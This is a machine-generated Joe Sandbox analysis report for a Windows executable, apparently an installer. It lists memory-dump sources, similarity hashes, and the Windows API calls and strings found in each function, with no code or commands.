• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
• Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
• Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
• Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
APIs
• 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
• EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
• 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
• 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: A4620A480A570EnumFonts
• String ID:
• API String ID: 178811091-0
• Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
• Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
• Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
• Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E
APIs
  • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
• FlushFileBuffers.KERNEL32(?), ref: 0045C7FD
Strings
• EndOffset range exceeded, xrefs: 0045C731
• NumRecs range exceeded, xrefs: 0045C6FA
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: File$BuffersFlush
• String ID: EndOffset range exceeded$NumRecs range exceeded
• API String ID: 3593489403-659731555
• Opcode ID: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
• Instruction ID: 42c6ccb15965a4bc01c0ab80d29458e35b3cecf9486565f2d0e9c4cbdba5a9bf
• Opcode Fuzzy Hash: 794c48d8177613dd3f63bd91f05815d926f9d199b7ec90082a892dce85f7227f
• Instruction Fuzzy Hash: A5617134A002988FDB24DF25C891AD9B7B5EF49305F0084DAED89AB352D774AEC9CF54
APIs
  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498586), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498586), ref: 00403356
  • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
  • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
  • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
  • Part of subcall function 00409B88: 6F9C1CD0.COMCTL32(0049859A), ref: 00409B88
  • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
  • Part of subcall function 00419050: GetVersion.KERNEL32(004985AE), ref: 00419050
  • Part of subcall function 0044F754: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
  • Part of subcall function 0044F754: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
  • Part of subcall function 0044FBFC: GetVersionExA.KERNEL32(0049B790,004985C7), ref: 0044FC0B
  • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
  • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
  • Part of subcall function 004531DC: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
  • Part of subcall function 004531DC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
  • Part of subcall function 00456EEC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
  • Part of subcall function 00464960: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
  • Part of subcall function 00464960: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
  • Part of subcall function 0046D098: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
  • Part of subcall function 00478B3C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
  • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
  • Part of subcall function 00478B3C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
  • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
• SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
  • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
  • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
  • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
• ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
  • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
• String ID: Setup
• API String ID: 504348408-3839654196
• Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
• Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
• Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
• Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003
                                                                                • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                                                • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: RegisteredOrganization$RegisteredOwner
                                                                                • API String ID: 3535843008-1113070880
                                                                                • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                                • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateErrorFileHandleLast
                                                                                • String ID: CreateFile
                                                                                • API String ID: 2528220319-823142352
                                                                                • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                                • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                                • API String ID: 71445658-1548894351
                                                                                • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                                • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                                APIs
                                                                                  • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                                  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                • API String ID: 2906209438-2320870614
                                                                                • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                                                • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                                                APIs
                                                                                  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorLibraryLoadModeProc
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2492108670-2683653824
                                                                                • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                                                • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                                                APIs
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2574300362-0
                                                                                • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                                                • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Append$System
                                                                                • String ID:
                                                                                • API String ID: 1489644407-0
                                                                                • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                                                • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                                                APIs
                                                                                • 751C1520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                                                • 751C1500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                                                • 751C1540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: C1500C1520C1540
                                                                                • String ID:
                                                                                • API String ID: 1315064709-0
                                                                                • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                                                • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                                                APIs
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                • TranslateMessage.USER32(?), ref: 0042449F
                                                                                • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 4217535847-0
                                                                                • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                APIs
                                                                                • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Prop$Window
                                                                                • String ID:
                                                                                • API String ID: 3363284559-0
                                                                                • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                                                • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
